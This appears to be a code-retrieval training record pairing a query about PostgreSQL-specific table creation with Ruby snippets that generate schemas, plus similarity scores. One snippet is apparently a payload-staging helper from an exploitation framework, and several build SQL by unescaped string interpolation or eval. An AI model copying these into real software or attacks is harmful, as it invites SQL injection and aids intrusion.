TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def generate_table_def_table()\r\n table_def_name = \"table_definitions\"\r\n\r\n # If the table doesn't already exist, create it\r\n puts \"Creating table definition table (#{table_def_name}) if it doesn't exist.\" if @enable_debug_logging\r\n db_column_size_limits = @db_column_size_limits\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n @db.create_table?(table_def_name.to_sym) do\r\n String :tableName, :primary_key => true, :size => db_column_size_limits[:tableName]\r\n String :kappSlug, :size => db_column_size_limits[:kappSlug]\r\n String :formSlug, :size => db_column_size_limits[:formSlug]\r\n String :formName, :size => db_column_size_limits[:formName]\r\n end\r\n end\r\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(HColumnDescriptor.new(arg))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n @formatter.header()\n @formatter.footer(now)\n end",
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:create_table, self, *args, &block)\n end",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def generate_column_def_table()\r\n table_def_name = \"column_definitions\"\r\n # If the table doesn't already exist, create it\r\n puts \"Creating column definition table (#{table_def_name}) if it doesn't exist.\" if @enable_debug_logging\r\n db_column_size_limits = @db_column_size_limits\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n @db.create_table?(table_def_name.to_sym) do\r\n String :tableName, :size => db_column_size_limits[:tableName]\r\n String :kappSlug, :size => db_column_size_limits[:kappSlug]\r\n String :formSlug, :size => db_column_size_limits[:formSlug]\r\n String :fieldName, :text => true\r\n String :fieldKey, :size => db_column_size_limits[:fieldKey]\r\n String :columnName, :size => db_column_size_limits[:columnName]\r\n primary_key [:tableName, :columnName]\r\n end\r\n end\r\n end",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create_table(klass)\n fields = fields_for_class(klass)\n\n sql = \"CREATE TABLE #{klass.table} (#{fields.join(', ')}\"\n\n # Create table constraints.\n\n if constraints = klass.ann(:self, :sql_constraint)\n sql << \", #{constraints.join(', ')}\"\n end\n\n # Set the table type (Mysql default, InnoDB, Hash, etc)\n\n if table_type = @options[:table_type]\n sql << \") TYPE = #{table_type};\"\n else\n sql << \")\"\n end\n\n begin\n exec(sql, false)\n info \"Created table #{klass.table}.\"\n rescue Object => ex\n if table_already_exists_exception? ex\n # Don't return yet. Fall trough to also check for the\n # join table.\n else\n handle_sql_exception(ex, sql)\n end\n end\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end",
"def alter_table(name, generator=nil, options=nil, &block)\n if Hash === options\n generator ||= Schema::AlterTableGenerator.new(self, &block)\n\t\t alter_table_sql_list(name, generator.operations, options).\n\t\t flatten.each {|sql| execute_ddl(sql)}\n\t\t remove_cached_schema(name)\n\t\t nil\n else\n\t super(name, generator, &block)\n end\n end",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def create_tables!\n migrate(:up)\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_table_with_storing_name(table_name, options = {}, &block)\n @@table_name = table_name\n create_table_without_storing_name table_name, options, &block\n AirBlade::Migrations::SchemaDefinitions.foreign_keys = []\n end",
"def new_table(name, field_defs, encrypt, record_class)\r\n # Header rec consists of last record no. used, delete count, and\r\n # all field names/types. Here, I am inserting the 'recno' field\r\n # at the beginning of the fields.\r\n header_rec = ['000000', '000000', record_class, 'recno:Integer',\r\n field_defs].join('|')\r\n\r\n header_rec = 'Z' + encrypt_str(header_rec) if encrypt\r\n\r\n begin\r\n fptr = open(File.join(@db.path, name.to_s + @db.ext), 'w')\r\n fptr.write(header_rec + \"\\n\")\r\n ensure\r\n fptr.close\r\n end\r\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def dump_table_schema(table, options={})\n table = table.value.to_s if table.is_a?(SQL::Identifier)\n raise(Error, \"must provide table as a Symbol, String, or Sequel::SQL::Identifier\") unless [String, Symbol].any?{|c| table.is_a?(c)}\n s = schema(table).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map{|x| x.first}\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:column_schema_to_generator_opts)\n im = method(:index_to_generator_opts)\n begin\n indexes = indexes(table).sort_by{|k,v| k.to_s} if options[:indexes] != false\n rescue Sequel::NotImplemented\n nil\n end\n gen = Schema::Generator.new(self) do\n s.each{|name, info| send(*m.call(name, info, options))}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))} if indexes\n end\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && indexes && !indexes.empty?}) do\\n#{commands.gsub(/^/o, ' ')}\\nend\"\n end",
"def alter_table_sql_list(table, operations, options=nil)\n\t return super(table, operations) unless Hash===options\n\t \n\t prologue = \"ALTER TABLE #{quote_schema_table(table)} \"\n\t sql = operations.map do |op|\n\t frag = alter_table_sql table, op\n\t raise ArgumentError unless frag.slice![0,prologue.length] == prologue\n\t frag\n\t end\n\t sql.push(table_options_sql(options)).join ' '\n end",
"def create_view_prefix_sql(name, options)\n create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}VIEW #{quote_schema_table(name)}\", options[:columns])\n end",
"def create_table(name)\n if ! db.tables.include?(name.to_sym)\n db.create_table name do\n String :name, :size => 15\n Float :freq\n index :freq\n end\n end\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_view_prefix_sql(name, options)\n sql = create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}#{'TEMPORARY 'if options[:temp]}#{'RECURSIVE ' if options[:recursive]}#{'MATERIALIZED ' if options[:materialized]}VIEW #{quote_schema_table(name)}\", options[:columns] || options[:recursive])\n\n if options[:security_invoker]\n sql += \" WITH (security_invoker)\"\n end\n\n if tablespace = options[:tablespace]\n sql += \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n sql\n end",
"def alter_table_sql(table, op)\n quoted_table = quote_identifier(table)\n quoted_name = quote_identifier(op[:name]) if op[:name]\n case op[:op]\n when :add_column\n \"ALTER TABLE #{quoted_table} ADD COLUMN #{column_definition_sql(op)}\"\n when :drop_column\n \"ALTER TABLE #{quoted_table} DROP COLUMN #{quoted_name}\"\n when :rename_column\n \"ALTER TABLE #{quoted_table} RENAME COLUMN #{quoted_name} TO #{quote_identifier(op[:new_name])}\"\n when :set_column_type\n \"ALTER TABLE #{quoted_table} ALTER COLUMN #{quoted_name} TYPE #{op[:type]}\"\n when :set_column_default\n \"ALTER TABLE #{quoted_table} ALTER COLUMN #{quoted_name} SET DEFAULT #{literal(op[:default])}\"\n when :add_index\n index_definition_sql(table, op)\n when :drop_index\n \"DROP INDEX #{default_index_name(table, op[:columns])}\"\n when :add_constraint\n \"ALTER TABLE #{quoted_table} ADD #{constraint_definition_sql(op)}\"\n when :drop_constraint\n \"ALTER TABLE #{quoted_table} DROP CONSTRAINT #{quoted_name}\"\n else\n raise Error, \"Unsupported ALTER TABLE operation\"\n end\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def alter_table_statement(table_name, operations)\n add_line \"alter_table #{table_name.inspect} do\"\n indent do\n operations.compact.each {|op| add_line op }\n end\n add_line \"end\"\n end",
"def create_table\n unless table_exists?\n key_options = connection.internal_string_options_for_primary_key\n\n connection.create_table(table_name, id: false) do |t|\n t.string :key, key_options\n t.string :value\n t.timestamps\n end\n end\n end",
"def create_table\n connection.create_table table_name do |t|\n t.string :record_class_name, :null => false\n t.integer :record_id, :null => false\n t.boolean :is_delete, :null => false, :default => false\n t.datetime :run_at, :null => false\n t.integer :priority, :null => false, :default => 0\n t.integer :lock, :null => true\n t.string :error, :null => true, :limit => 4000\n t.integer :attempts, :null => false, :default => 0\n end\n\n connection.add_index table_name, :record_id\n connection.add_index table_name, [:run_at, :record_class_name, :priority], :name => \"#{table_name}_run_at\"\n end",
"def create_table(name=nil, *field_defs)\r\n raise \"Can't call #create_table from server!\" if server?\r\n\r\n t_struct = Struct.new(:name, :field_defs, :encrypt, :record_class)\r\n t = t_struct.new\r\n t.name = name\r\n t.field_defs = field_defs\r\n t.encrypt = false\r\n t.record_class = 'Struct'\r\n\r\n yield t if block_given?\r\n\r\n raise \"Name must be a symbol!\" unless t.name.is_a?(Symbol)\r\n raise \"No table name specified!\" if t.name.nil?\r\n raise \"No table field definitions specified!\" if t.field_defs.nil?\r\n\r\n # Can't create a table that already exists!\r\n raise \"Table already exists!\" if table_exists?(t.name)\r\n\r\n raise 'Must have a field type for each field name' \\\r\n unless t.field_defs.size.remainder(2) == 0\r\n\r\n # Check to make sure there are no duplicate field names.\r\n temp_field_names = []\r\n (0...t.field_defs.size).step(2) do |x|\r\n temp_field_names << t.field_defs[x]\r\n end\r\n raise 'Duplicate field names are not allowed!' unless \\\r\n temp_field_names == temp_field_names.uniq\r\n \r\n temp_field_defs = []\r\n (0...t.field_defs.size).step(2) do |x|\r\n temp_field_defs << build_header_field_string(t.field_defs[x],\r\n t.field_defs[x+1])\r\n end\r\n\r\n @engine.new_table(t.name, temp_field_defs, t.encrypt,\r\n t.record_class.to_s)\r\n\r\n return get_table(t.name)\r\n end",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def get_ddl(cfg)\n <<-EOS\n CREATE TABLE operations (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(100) NOT NULL,\n txid VARCHAR(100) NOT NULL,\n amount DECIMAL(16,8) NOT NULL,\n block_height INTEGER NOT NULL,\n block_hash VARCHAR(100) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`),\n KEY `idx_txid` (`txid`),\n UNIQUE KEY `idx_address_txid` (`address`, `txid`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n CREATE TABLE addresses (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(255) DEFAULT NULL,\n total_received DECIMAL(16,8) DEFAULT NULL,\n balance DECIMAL(16,9) DEFAULT NULL,\n n_tx INTEGER NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n EOS\n end",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"../../migration/templates/create_table_migration.rb\", File.join(db_migrate_path, \"create_#{table_name}.rb\")\n end",
"def sqlite3_create_tb(table_name, columns, primary_key, if_not_exist)\n if if_not_exist.downcase == \"n\"\n status = @dbm.table_exist?(table_name)\n @assert.table_already_exist(status, table_name, @dbh)\n end \n\n # Retrieve only the column names\n col_names = columns[0].keys\n\n table_spec_str = '('\n # col: Column name\n # columns[0][col][0]: Column type\n # columns[1][col][1]: Column nullable\n col_names.each {|col|\n col_type = columns[0][col][0]\n @assert.check_type(col_type)\n if col == primary_key\n table_spec_str.concat(\"#{col} #{col_type} PRIMARY KEY NOT NULL,\")\n else\n if columns[0][col][1].downcase == \"no\"\n table_spec_str.concat(\"#{col} #{col_type} NOT NULL,\")\n else\n table_spec_str.concat(\"#{col} #{col_type},\")\n end\n end\n }\n table_spec_str.chomp!(',')\n table_spec_str.concat(')')\n \n create_query = \"CREATE TABLE IF NOT EXISTS #{table_name} #{table_spec_str};\"\n @dbh.execute(create_query)\n\n return create_query + \"\\n\"\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def create_table_like(like_table, table, options = {}, &blk)\n options.symbolize_keys!\n code = table_schema_code(like_table)\n code.gsub!(/create_table\\s+\"#{like_table}\"/, \"create_table :#{table}\")\n if options[:replace_keys] or options[:remove_keys]\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"#add_index :#{table}\")\n else\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"add_index :#{table}\")\n end\n eval(code)\n change_table(table,&blk) if block_given?\n true\n end",
"def get_schema_sql(table_struct, table_name = NEW_TABLE_NAME)\n dbstruct = []\n pkeys = []\n\n table_struct.each do | row |\n dbstruct << \"`#{row[:field]}` #{row[:type]} #{(!row[:default].nil? && row[:default] != '' ) ? \"default '#{row[:default]}'\" : ''} #{row[:null] == 'NO' ? 'NOT NULL' : ''}\"\n pkeys << \"`#{row[:field]}`\" if row[:key] == 'PRI'\n end \n\n dbstruct << \"PRIMARY KEY (%s)\" % [pkeys.join(', ')]\n dbstring = \"CREATE TABLE `%s` (\\n\\t%s\\n)\" % [table_name, dbstruct.join(\",\\n\\t\")]\n\n dbstring\nend",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def create_table(table_name, options={})\n query = { }\n query['timeout'] = options[:timeout].to_s if options[:timeout]\n\n body = Table::Serialization.hash_to_entry_xml({\"TableName\" => table_name}).to_xml\n call(:post, collection_uri(query), body, {}, options)\n nil\n end",
"def create_migration_file\n return if skip_migration_creation?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", File.join(db_migrate_path, \"create_#{table_name}.rb\")\n end",
"def table_options_sql(options)\n\t sql = []\n\t sql << flag_option_sql(options, :parallel)\n\t sql << flag_option_sql(options, :logging)\n\t sql << flag_option_sql(options, :monitoring)\n\t sql << \"TABLESPACE #{quote_identifier(options[:tablespace])}\" if options[:tablespace]\n\t sql << compress_option_sql(options)\n\t sql << options[:options] if String === options[:options]\n\t sql.compact.join ' '\n\t end",
"def quote_table_or_view(name, options)\n schema = options[:schema]\n if schema\n \"\\\"#{schema}\\\".\\\"#{name}\\\"\"\n else\n \"\\\"#{name}\\\"\"\n end\n end",
"def alter_table_sql(table, op)\n case op[:op]\n when :add_column\n \"ALTER TABLE #{quote_schema_table(table)} ADD #{column_definition_sql(op)}\"\n when :drop_column\n \"ALTER TABLE #{quote_schema_table(table)} DROP #{column_definition_sql(op)}\"\n when :rename_column\n \"ALTER TABLE #{quote_schema_table(table)} ALTER #{quote_identifier(op[:name])} TO #{quote_identifier(op[:new_name])}\"\n when :set_column_type\n \"ALTER TABLE #{quote_schema_table(table)} ALTER #{quote_identifier(op[:name])} TYPE #{type_literal(op)}\"\n else\n super(table, op)\n end\n end"
] |
[
"0.75814897",
"0.73549694",
"0.7348603",
"0.7305695",
"0.72647333",
"0.72407156",
"0.7212776",
"0.71801597",
"0.7177178",
"0.71413916",
"0.71264935",
"0.7111634",
"0.71094227",
"0.7092248",
"0.708161",
"0.7043943",
"0.70318645",
"0.69537044",
"0.6920031",
"0.6907666",
"0.6892962",
"0.68670744",
"0.67847776",
"0.66891116",
"0.6627652",
"0.66233706",
"0.65898216",
"0.65281415",
"0.65184313",
"0.65131235",
"0.64973325",
"0.6489502",
"0.6480767",
"0.6478118",
"0.64594126",
"0.64454144",
"0.64421093",
"0.64265186",
"0.6393143",
"0.63906664",
"0.6357786",
"0.6357272",
"0.63484555",
"0.6334175",
"0.63226825",
"0.63103324",
"0.63049245",
"0.6260207",
"0.6250404",
"0.62503237",
"0.6246205",
"0.62370443",
"0.6224804",
"0.622338",
"0.6215021",
"0.620762",
"0.6206132",
"0.6205145",
"0.6199986",
"0.61848706",
"0.6178895",
"0.6173954",
"0.6167549",
"0.61582685",
"0.60998774",
"0.6089966",
"0.6089056",
"0.6085457",
"0.6079365",
"0.606488",
"0.6048808",
"0.60461515",
"0.6031049",
"0.60287565",
"0.60266596",
"0.6013976",
"0.60014284",
"0.5994754",
"0.5992714",
"0.5991072",
"0.5989817",
"0.5986302",
"0.59787565",
"0.5975268",
"0.59727764",
"0.5970132",
"0.59498554",
"0.5940626",
"0.5939893",
"0.59376645",
"0.59359086",
"0.59151846",
"0.59091413",
"0.59003055",
"0.5896224",
"0.5885815",
"0.5883113",
"0.5878572",
"0.5872777",
"0.5872361"
] |
0.68803096
|
21
|
SQL for creating a table with PostgreSQL specific options
|
def create_table_sql(name, generator, options)
"#{super}#{create_table_suffix_sql(name, options)}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def postgres_create_stager_table\n tbl = Rex::Text.rand_text_alpha(8).downcase\n fld = Rex::Text.rand_text_alpha(8).downcase\n resp = postgres_query(\"create temporary table #{tbl}(#{fld} text)\")\n if resp[:sql_error]\n print_error resp[:sql_error]\n return false\n end\n return [tbl,fld]\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def show_create_table(db, table)\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def create_table_as(name, sql, options)\n sql = sql.sql if sql.is_a?(Sequel::Dataset)\n run(create_table_as_sql(name, sql, options))\n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
